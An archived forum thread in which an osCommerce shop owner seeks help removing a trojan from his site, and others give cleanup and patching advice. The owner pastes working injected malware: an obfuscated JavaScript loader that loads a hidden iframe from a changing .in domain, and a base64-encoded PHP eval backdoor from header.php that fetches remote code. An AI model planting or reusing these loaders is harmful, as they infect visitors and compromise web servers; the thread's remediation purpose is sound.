Tsport Posted February 24, 2011 Share Posted February 24, 2011 Hey everyone. i got some strange problem, some trojan virus can be detected when you first enters to the web-site. it shows sometimes that http://4684/and some thing here is loggened, and the virus thread pop ups! heres my web http://billing.iqxtech.com please tell me some advice how to remove it... or how to find it Link to comment Share on other sites More sharing options...
germ Posted February 24, 2011 Share Posted February 24, 2011 I don't see any malicious files, or scripts or iframes in the source. Check the contents of the .htaccess in the root folder for redirects to other sites. If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you. "Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me - "Headers already sent" - The definitive help "Cannot redeclare ..." - How to find/fix it SSL Implementation Help Like this post? "Like" it again over there > Link to comment Share on other sites More sharing options...
Guest Posted February 25, 2011 Share Posted February 25, 2011 Alex, I agree with Jim. I did not really find any signs hacker files and received no security messages while looking around your website. Chris Link to comment Share on other sites More sharing options...
Tsport Posted March 6, 2011 Author Share Posted March 6, 2011 i still got the same problem!!! some times i got some strange trojan secure report! when i just get in the index and in the source i found this <div style="display: block;overflow:hidden;width:0;height:0;left:0px;position:absolute;top:0px"><img id="8931" height="1" width="1"><img src="about:blank" onError='njjavmj=unescape("%27");jaeju=eval("document.getElementById("+njjavmj+"rsaqr"+njjavmj+").src=unescape("+njjavmj+"%68%74%74%70%3A%2F%2F"+njjavmj+")+document.getElementById("+njjavmj+"8931"+njjavmj+").id+unescape("+njjavmj+"%2E%69%6E%2F"+njjavmj+")+"+njjavmj+"1299430150"+njjavmj+"+unescape("+njjavmj+"%2E%70%68%70"+njjavmj+")");document.getElementById("rsaqr").src=jaeju' style="width:300;height:300;border:0px;"><iframe id="rsaqr" src="about:blank"></iframe></div><!-- header_eof //--> and the trojan comes from http://8931.in/dududu.js i have tried to find this source code in all the pages: header.php index.php and etc and i found nothing! and btw the four nombers always change sometimes it can be like 5436.in/ and so on... and when i got no trojan reports the source is witchout this code </script><form name="quick_find" action="http://billing.iqxtech.com/advanced_search_result.php" method="get"><input type="text" name="keywords" value="חיפוש מהיר..." id="txtSearch" size="15" onFocus="Clear(this)" autocomplete="off" maxlength="50" class=searchHeader> <input type="hidden" name="osCsid" value="f257a22ba87b3527fbac707b28c7140f"> <input type=image src=layout/images/search_btn.gif align="absmiddle" > </form></div></div><br class="clearfloat" /> <div id="mainContent"> <div style="display: block;overflow:hidden;width:0;height:0;left:0px;position:absolute;top:0px"><img id="8931" height="1" width="1"><img src="about:blank" onError='njjavmj=unescape("%27");jaeju=eval("document.getElementById("+njjavmj+"rsaqr"+njjavmj+").src=unescape("+njjavmj+"%68%74%74%70%3A%2F%2F"+njjavmj+")+document.getElementById("+njjavmj+"8931"+njjavmj+").id+unescape("+njjavmj+"%2E%69%6E%2F"+njjavmj+")+"+njjavmj+"1299430150"+njjavmj+"+unescape("+njjavmj+"%2E%70%68%70"+njjavmj+")");document.getElementById("rsaqr").src=jaeju' style="width:300;height:300;border:0px;"><iframe id="rsaqr" src="about:blank"></iframe></div><!-- header_eof //--> <!-- body //--> up to <div style="display: block; the source is in header.php heres the site http://iqxtech.com Link to comment Share on other sites More sharing options...
germ Posted March 6, 2011 Share Posted March 6, 2011 Hack files currently in your images folder: google033ca56fcb20d1b7.php googlec6e11a4aebef71ed.php googleeeae99914d1a2ad8.php Hackers hide their code. Look for code in your files that has these php keywords: base64_decode or eval or gzinflate If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you. "Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me - "Headers already sent" - The definitive help "Cannot redeclare ..." - How to find/fix it SSL Implementation Help Like this post? "Like" it again over there > Link to comment Share on other sites More sharing options...
Tsport Posted March 6, 2011 Author Share Posted March 6, 2011 how should i look for them in my php files? with what program? Thank you! Link to comment Share on other sites More sharing options...
germ Posted March 6, 2011 Share Posted March 6, 2011 I don't see anything like the code you posted in the page source when I access the site. If you found it in the header then use a text editor and look in /includes/header.php If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you. "Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me - "Headers already sent" - The definitive help "Cannot redeclare ..." - How to find/fix it SSL Implementation Help Like this post? "Like" it again over there > Link to comment Share on other sites More sharing options...
Tsport Posted March 6, 2011 Author Share Posted March 6, 2011 i have deleted the google033ca56fcb20d1b7.php googlec6e11a4aebef71ed.php googleeeae99914d1a2ad8.php in image folder and the hack has gone :P now i need to protect my folders Link to comment Share on other sites More sharing options...
WhiteKnight Posted March 6, 2011 Share Posted March 6, 2011 how should i look for them in my php files? with what program? Thank you! If you use most web editing tools (like Dreamweaver) you will have a search or find function and usually options on how it does that. So you search or find for "base64_decode" (for example) and select entire site. Then you will get a list of files with that code in them. In the case of this example it is usually at the top of every php file in the site and it is usually easier to upload a clean copy of your files than fix every file. Search the forums or Google for how to fix your system to prevent specific things you find. If you have a way to get a files count on your host (maybe 400-several thousand files) you can check that and when no users are on it should only change when you add something. If it changes without you adding something than someone else added some file somewhere. Sometimes you can find those by sorting by date/time on the host and seeing what the "new" files(s) are. Of course do all the regular security measures detailed elsewhere on the forums, like file/dir permission, htaccess, etc. Good luck. Link to comment Share on other sites More sharing options...
Guest Posted March 6, 2011 Share Posted March 6, 2011 I wouldn't suggest using Dreamweaver at all! Use Wingrep to search all files once downloaded onto your local machine. Chris Link to comment Share on other sites More sharing options...
Taipo Posted March 7, 2011 Share Posted March 7, 2011 You also need to patch your website so that an attacker cannot return and repeat the same action again. - Stop Oscommerce hacks dead in their tracks with osC_Sec (see discussion here)- Another discussion about infected files ::here::- A discussion on file permissions ::here::- Site hacked? Should you upgrade or not, some thoughts ::here::- Fix the admin login bypass exploit here- Pareto Security: New security addon I am developing, a remake of osC_Sec in PHP 5 with a number of fixes- BTC:1LHiMXedmtyq4wcYLedk9i9gkk8A8Hk7qX Link to comment Share on other sites More sharing options...
Tsport Posted March 8, 2011 Author Share Posted March 8, 2011 what patch? can you link to the patch please? i have found this code: <?php eval(base64_decode("ZnVuY3Rpb24gczM3KCRzKXtmb3IgKCRhID0gMDsgJGEgPD0gc3RybGVuKCRzKS0xOyAkYSsrICl7JGUgLj0gJHN7c3RybGVuKCRzKS0kYS0xfTt9cmV0dXJuKCRlKTt9ZXZhbChzMzcoJzsibmkiPTczYyQ7InB0dGgiPTczaCQ7InN0YXRzIj03M3okJykpO2V2YWwoczM3KCc7XSJUTkVHQV9SRVNVX1BUVEgiW1JFVlJFU18kPTNhdSQnKSk7ZXZhbChzMzcoJzspInJlbGJtYVIiICwieGVkbmFZIiAsInJldmloY3JhX2FpIiAsInRvQk5TTSIgLCJwcnVsUyIgLCJlbGdvb0ciKHlhcnJhID0gNzN1JCcpKTtldmFsKHMzNygnfX07bHJ1JCBvaGNlO10xW2xydSQgPSBscnUkIDspbHJ1JCwiIW9nISIoZWRvbHB4ZSA9IGxydSR7KSkiIW9nISIsbHJ1JChydHNydHMoIGZpOykpXSJUU09IX1BUVEgiW1JFVlJFU18kKGVkb2NuZWxydS4iPWgmIi4pM2F1JChlZG9jbmVscnUuIj1iJiIuXSJSRERBX0VUT01FUiJbUkVWUkVTXyQuIj1pIi4iP3AiLiJocC4iLjczYyQuIi83M2MkLiIuNzNjJC43M2MkLjczYyQuNzNjJC43M2MkLiIvLyIuIjoiLjczaCQoc3RuZXRub2NfdGVnX2VsaWZAID0gbHJ1JCA7KTAwODAxKykoZW1pdCwpInN0YXRzIig1ZG0sNzN6JChlaWtvb2N0ZXNAIHsgZXNsZSB9eyApKSldNzN6JFtFSUtPT0NfJCh0ZXNzaSggcm8gKSkzYXUkICwiaS8iIC4gKTczdSQgLCJ8IihlZG9scG1pIC4gIi8iKGhjdGFtX2dlcnAoKGZpJykpOw=="));?> in Header.php can you decode it ?:P interesting whats typed in there Link to comment Share on other sites More sharing options...
Taipo Posted March 8, 2011 Share Posted March 8, 2011 The eval code you posted when decoded contains a function that when called allows eval code strings to be called in reverse (basically reading code backwards). It looks to me like its a logging script that logs the site visitors ip and downloads some code (probably a file with a virus in it) from a url on a server at http:// ininininin.in/ as well as places a cookie in your browser while bypassing and search engines that may view that page. As for the patch link, there are quite a few posts in this forum with extensive lists of instructions of how to patch your site to clean up affected pages and patch the security holes so that attackers cannot further compromise your security. Most of them are in reference to this type of problem. - Stop Oscommerce hacks dead in their tracks with osC_Sec (see discussion here)- Another discussion about infected files ::here::- A discussion on file permissions ::here::- Site hacked? Should you upgrade or not, some thoughts ::here::- Fix the admin login bypass exploit here- Pareto Security: New security addon I am developing, a remake of osC_Sec in PHP 5 with a number of fixes- BTC:1LHiMXedmtyq4wcYLedk9i9gkk8A8Hk7qX Link to comment Share on other sites More sharing options...
Jeanne1971 Posted March 17, 2011 Share Posted March 17, 2011 I've also got the "Trojan Virus" that keeps being blocked by Avast. So far, an item has been removed, only for it to return. Not sure what to do. States: Trojan Horse JS:IFrame-AU[Trj} Please help. Any help would be SO appreciated. Thank you so much in advance. Jeanne Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.